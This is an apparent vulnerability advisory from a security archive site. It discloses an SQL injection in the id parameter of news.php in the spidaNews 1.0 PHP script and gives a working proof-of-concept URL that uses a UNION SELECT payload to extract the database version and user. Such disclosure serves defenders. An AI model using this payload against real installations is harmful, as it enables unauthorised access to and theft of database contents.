spidaNews 1.0 SQL Injection

2011-04-04 / 2011-04-05
Credit: Easy Laster
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

----------------------------Information------------------------------------------------ +Name : spidaNews V.1.0 SQL injection Vulnerability news.php (id) +Autor : Easy Laster +Date : 02.04.2011 +Script : spidaNews V.1.0 +Download : http://www.spidanet.de/webmaster/download/spidaNews.zip +Price : free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project.com +Greetz to Team-Internet ,Underground Agents, websec-empire.to and free-hack.com +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr.ChAoS,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne,n3w7u,Maverick010101,s0red,c1ox,enco. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- #proof of concept http://localhost/spidaNews/news.php?id=%27/**/+union+/**/select/**/+1,2,3 ,version(),user(),6/**/--+


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top